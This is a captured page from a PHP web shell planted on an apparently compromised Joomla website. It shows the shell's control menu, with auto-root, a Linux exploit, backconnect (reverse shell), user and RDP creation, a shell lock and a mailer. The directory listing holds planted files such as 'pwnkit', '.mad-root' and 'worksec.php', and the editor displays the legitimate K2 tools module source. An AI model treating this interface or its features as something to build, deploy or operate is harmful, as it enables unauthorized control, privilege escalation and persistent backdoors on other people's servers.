Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
modules /
mod_k2_tools /
[ HOME SHELL ]
Name
Size
Permission
Action
includes
[ DIR ]
drwxr-xr-x
tmpl
[ DIR ]
drwxr-xr-x
.htaccess
533
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
admin.php
5.24
KB
-rw-r--r--
helper.php
40.87
KB
-rw----r--
index.html
44
B
-rw----r--
index.php
7
KB
-rw-r--r--
mod_k2_tools.php
3.02
KB
-rw----r--
mod_k2_tools.xml
12.2
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mod_k2_tools.php
<?php /** * @version 2.9.x * @package K2 * @author JoomlaWorks https://www.joomlaworks.net * @copyright Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved. * @license GNU/GPL license: http://www.gnu.org/copyleft/gpl.html */ // no direct access defined('_JEXEC') or die; if (K2_JVERSION != '15') { $language = JFactory::getLanguage(); $language->load('com_k2.dates', JPATH_ADMINISTRATOR, null, true); } require_once(dirname(__FILE__).'/helper.php'); // Params $moduleclass_sfx = $params->get('moduleclass_sfx', ''); $module_usage = $params->get('module_usage', 0); $authorAvatarWidthSelect = $params->get('authorAvatarWidthSelect', 'custom'); $authorAvatarWidth = $params->get('authorAvatarWidth', 50); $button = $params->get('button'); $imagebutton = $params->get('imagebutton'); $button_pos = $params->get('button_pos', 'left'); $button_text = $params->get('button_text', JText::_('K2_SEARCH')); $text = $params->get('text', JText::_('K2_SEARCH')); $searchItemId = $params->get('searchItemId', ''); // API $document = JFactory::getDocument(); $app = JFactory::getApplication(); // Output switch ($module_usage) { case '0': $months = modK2ToolsHelper::getArchive($params); if (count($months)) { require(JModuleHelper::getLayoutPath('mod_k2_tools', 'archive')); } break; case '1': // User avatar if ($authorAvatarWidthSelect == 'inherit') { $componentParams = JComponentHelper::getParams('com_k2'); $avatarWidth = $componentParams->get('userImageWidth'); } else { $avatarWidth = $authorAvatarWidth; } $authors = modK2ToolsHelper::getAuthors($params); require(JModuleHelper::getLayoutPath('mod_k2_tools', 'authors')); break; case '2': $calendar = modK2ToolsHelper::calendar($params); require(JModuleHelper::getLayoutPath('mod_k2_tools', 'calendar')); break; case '3': $breadcrumbs = modK2ToolsHelper::breadcrumbs($params); $path = $breadcrumbs[0]; $title = $breadcrumbs[1]; require(JModuleHelper::getLayoutPath('mod_k2_tools', 'breadcrumbs')); break; case '4': $output = modK2ToolsHelper::treerecurse($params, 0, 0, true); require(JModuleHelper::getLayoutPath('mod_k2_tools', 'categories')); break; case '5': echo modK2ToolsHelper::treeselectbox($params); break; case '6': $categoryFilter = modK2ToolsHelper::getSearchCategoryFilter($params); $action = JRoute::_(K2HelperRoute::getSearchRoute()); require(JModuleHelper::getLayoutPath('mod_k2_tools', 'search')); break; case '7': $tags = modK2ToolsHelper::tagCloud($params); if (count($tags)) { require(JModuleHelper::getLayoutPath('mod_k2_tools', 'tags')); } break; case '8': $customcode = modK2ToolsHelper::renderCustomCode($params); require(JModuleHelper::getLayoutPath('mod_k2_tools', 'customcode')); break; }
Close